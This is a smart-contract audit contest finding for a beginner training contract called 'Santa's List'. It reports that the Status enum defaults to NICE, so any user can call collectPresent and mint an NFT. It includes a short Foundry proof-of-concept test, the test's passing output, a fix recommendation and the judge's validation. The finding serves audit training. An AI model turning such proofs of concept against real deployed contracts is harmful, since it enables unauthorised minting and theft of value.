First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Minting NFT presents without Santa's checks

wafflemakr

Summary

Minting NFT presents without Santa's checks

Vulnerability Details

SantasList::collectPresent checks the mappings s_theListCheckedOnce and s_theListCheckedTwice to validate if Santas has checked them twice. But, users by default have the NICE status in these mappings. Therefore, users can call SantasList::collectPresent, which internally calls _mintAndIncrement, effectively minting a NFT present to the sender.

PoC

function testMintPresentWithoutChecksBySanta() public {
// when
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.prank(user);
santasList.collectPresent();
// user balance
vm.prank(user);
assertEq(santasList.balanceOf(user), 1);
}

Output:

forge test --mt testMintPresentWithoutChecksBySanta -vv
[⠒] Compiling...
No files changed, compilation skipped
Running 1 test for test/unit/SantasListTest.t.sol:SantasListTest
[PASS] testMintPresentWithoutChecksBySanta() (gas: 87535)
Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.93ms

Impact

HIGH.

Tools Used

  • Manual Review

  • Foundry

Recommendations

Consider updating the default value of the Status enum, so not all users have the NICE status by default.

Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

default status is nice

In Solidity the first element of an enum is the default value. In Santa's List, the means each person is mapped by default to 'NICE'.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.